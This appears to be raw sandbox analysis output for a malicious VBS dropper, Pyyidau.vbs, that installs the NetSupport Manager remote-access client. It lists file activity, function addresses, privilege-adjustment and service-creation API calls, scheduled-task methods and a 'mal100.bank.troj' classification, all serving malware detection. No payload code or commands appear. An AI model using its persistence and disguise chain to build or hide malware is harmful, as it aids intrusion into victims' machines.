                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5
                                Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIE5EC.tmpJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_04EAA7D84_2_04EAA7D8
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_04EAA7C84_2_04EAA7C8
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_04EA97284_2_04EA9728
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_04EA97184_2_04EA9718
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_077D13E54_2_077D13E5
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_0934A0434_2_0934A043
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_093474404_2_09347440
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_093486E04_2_093486E0
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_09343BD84_2_09343BD8
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_09343BC84_2_09343BC8
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_0934DAB04_2_0934DAB0
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_0934DAA04_2_0934DAA0
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_093435784_2_09343578
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_093435884_2_09343588
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_093474314_2_09347431
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_093486D14_2_093486D1
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_0998F5884_2_0998F588
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_099700064_2_09970006
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_099700404_2_09970040
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005B415025_2_005B4150
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005B013025_2_005B0130
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005FE33C25_2_005FE33C
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_006043A625_2_006043A6
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_0060E49925_2_0060E499
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_0060C64225_2_0060C642
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005E486025_2_005E4860
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_0060483B25_2_0060483B
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_0061096125_2_00610961
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005DCB7025_2_005DCB70
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_00608BF825_2_00608BF8
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_00604BD925_2_00604BD9
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_0060CB9325_2_0060CB93
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005A8C7025_2_005A8C70
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_00604FAB25_2_00604FAB
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005EB00025_2_005EB000
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_0060D0E425_2_0060D0E4
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D108025_2_005D1080
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_006071BA25_2_006071BA
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_0060539325_2_00605393
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005AF4C025_2_005AF4C0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005AB6F025_2_005AB6F0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_0060D77725_2_0060D777
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_0060D9F225_2_0060D9F2
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005CFAD025_2_005CFAD0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D1B1025_2_005D1B10
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_0060DCF125_2_0060DCF1
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_0059FD0025_2_0059FD00
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005EBDEC25_2_005EBDEC
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_008F013027_2_008F0130
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_008F415027_2_008F4150
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009443A627_2_009443A6
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0093E33C27_2_0093E33C
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0094E49927_2_0094E499
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0094C64227_2_0094C642
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0094483B27_2_0094483B
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0092486027_2_00924860
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0095096127_2_00950961
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0094CB9327_2_0094CB93
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_00944BD927_2_00944BD9
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_00948BF827_2_00948BF8
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0091CB7027_2_0091CB70
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_008E8C7027_2_008E8C70
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_00944FAB27_2_00944FAB
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0091108027_2_00911080
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0094D0E427_2_0094D0E4
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0092B00027_2_0092B000
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009471BA27_2_009471BA
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0094539327_2_00945393
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_008EF4C027_2_008EF4C0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_008EB6F027_2_008EB6F0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0094D77727_2_0094D777
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0094D9F227_2_0094D9F2
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0090FAD027_2_0090FAD0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_00911B1027_2_00911B10
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0094DCF127_2_0094DCF1
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0092BDEC27_2_0092BDEC
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_008DFD0027_2_008DFD00
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_0077FAE028_2_0077FAE0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007982BC28_2_007982BC
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_0079E39E28_2_0079E39E
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007A844D28_2_007A844D
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007AA53128_2_007AA531
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007A65F828_2_007A65F8
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007645E028_2_007645E0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_0079E83328_2_0079E833
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007A6B4728_2_007A6B47
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_00754B1028_2_00754B10
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_0079EBD128_2_0079EBD1
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007A2C9C28_2_007A2C9C
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_0079EFA328_2_0079EFA3
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007A709828_2_007A7098
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007A11FE28_2_007A11FE
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_0079F38B28_2_0079F38B
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_0078163028_2_00781630
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007A772B28_2_007A772B
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007A79A628_2_007A79A6
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_0077FAE028_2_0077FAE0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_00761BD028_2_00761BD0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007A7CA528_2_007A7CA5
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FECB7029_2_00FECB70
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FB8C7029_2_00FB8C70
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FEDDD029_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FC415029_2_00FC4150
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FC013029_2_00FC0130
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_0100E33C29_2_0100E33C
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_010143A629_2_010143A6
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_0101E49929_2_0101E499
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_0101C64229_2_0101C642
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_0102096129_2_01020961
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FF486029_2_00FF4860
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_0101483B29_2_0101483B
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_0101CB9329_2_0101CB93
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_01014BD929_2_01014BD9
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_01018BF829_2_01018BF8
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_01014FAB29_2_01014FAB
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE108029_2_00FE1080
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_010171BA29_2_010171BA
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FFB00029_2_00FFB000
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_0101D0E429_2_0101D0E4
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_0101539329_2_01015393
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FBF4C029_2_00FBF4C0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FBB6F029_2_00FBB6F0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_0101D77729_2_0101D777
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_0101D9F229_2_0101D9F2
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FDFAD029_2_00FDFAD0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE1B1029_2_00FE1B10
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FFBDEC29_2_00FFBDEC
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_0101DCF129_2_0101DCF1
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FAFD0029_2_00FAFD00
                                Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Load Driver
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess token adjusted: Security
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: String function: 005DF030 appears 282 times
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: String function: 005F91F9 appears 43 times
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: String function: 005B0C30 appears 319 times
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: String function: 005E9116 appears 64 times
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: String function: 005EDCC0 appears 88 times
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: String function: 005E7376 appears 38 times
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: String function: 005EB3F0 appears 34 times
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: String function: 006114E7 appears 61 times
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: String function: 0092DCC0 appears 88 times
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: String function: 00929116 appears 64 times
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: String function: 009391F9 appears 43 times
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: String function: 0092B3F0 appears 34 times
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: String function: 009514E7 appears 61 times
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: String function: 00927376 appears 38 times
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: String function: 0091F030 appears 282 times
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: String function: 008F0C30 appears 319 times
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: String function: 00752B26 appears 229 times
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: String function: 00788080 appears 78 times
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: String function: 00793CC3 appears 40 times
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: String function: 00FEF030 appears 282 times
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: String function: 00FFDCC0 appears 88 times
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: String function: 010214E7 appears 61 times
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: String function: 00FF9116 appears 59 times
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: String function: 00FC0C30 appears 319 times
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: String function: 00FFB3F0 appears 34 times
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: String function: 00FF7376 appears 38 times
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: String function: 010091F9 appears 43 times
                                Source: Pyyidau.vbsInitial sample: Strings found which are bigger than 50
                                Source: WdfCoInstaller01005.dll.20.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 1351826 bytes, 5 files, at 0x44 +A "Wdf01000.inf" +A "Wdf.cat", flags 0x4, ID 18394, number 1, extra bytes 20 in head, 62 datablocks, 0x1503 compression
                                Source: api-ms-win-crt-conio-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-private-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-interlocked-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-time-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-console-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-util-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-math-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-localization-l1-2-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-string-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l2-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-environment-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-locale-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-heap-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-convert-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-processthreads-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-rtlsupport-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-debug-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-libraryloader-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l1-2-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-errorhandling-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-processthreads-l1-1-1.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-profile-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-heap-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-namedpipe-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-stdio-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-multibyte-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-filesystem-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-handle-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-synch-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-sysinfo-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-synch-l1-2-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-utility-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-string-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-timezone-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-processenvironment-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-memory-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-datetime-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-runtime-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-process-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                                Source: Pyyidau.vbs.exe, 00000004.00000002.114083339160.0000000010131000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcredist_x86.exe~/ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000004F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000004.00000002.114022026314.000000000DB61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcredist_x86.exe~/ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113948697299.0000000003119000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000004.00000000.113910990592.0000000000CB4000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000004.00000002.114108278317.0000000011131000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcredist_x86.exe~/ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113967583372.0000000009590000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Pyyidau.vbs
                                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2299
                                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2299Jump to behavior
                                Source: WdfCoInstaller01005.dll.20.drStatic PE information: Section: .rsrc ZLIB complexity 0.9963142759691381
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: classification engineClassification label: mal100.bank.troj.expl.evad.winVBS@62/246@4/3
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005AC060 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,25_2_005AC060
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005AC0F0 AdjustTokenPrivileges,CloseHandle,25_2_005AC0F0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D22C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,CloseHandle,25_2_005D22C0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D4420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,25_2_005D4420
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005AEAB0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,25_2_005AEAB0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005E15D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,25_2_005E15D0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_008EC0F0 AdjustTokenPrivileges,CloseHandle,27_2_008EC0F0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_008EC060 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,27_2_008EC060
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009122C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,CloseHandle,27_2_009122C0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_00914420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,27_2_00914420
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_008EEAB0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,27_2_008EEAB0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009215D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,27_2_009215D0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FBC0F0 AdjustTokenPrivileges,CloseHandle,29_2_00FBC0F0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FBC060 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,29_2_00FBC060
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE22C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,CloseHandle,29_2_00FE22C0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE4420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,29_2_00FE4420
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FBEAB0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,29_2_00FBEAB0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FF15D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,29_2_00FF15D0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: OpenSCManagerW,GetLastError,CloseServiceHandle,wsprintfW,CloseServiceHandle,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,ChangeServiceConfigW,CloseServiceHandle,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryW,OpenSCManagerW,FreeLibrary,GetSystemDirectoryW,OpenSCManagerW,GetLastError,FreeLibrary,CloseServiceHandle,25_2_005DB310
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: CreateServiceW,GetLastError,StartServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,25_2_005DF880
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: CreateServiceW,GetLastError,FreeLibrary,CloseServiceHandle,FreeLibrary,25_2_005ABB90
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: CreateServiceW,GetLastError,25_2_00599C70
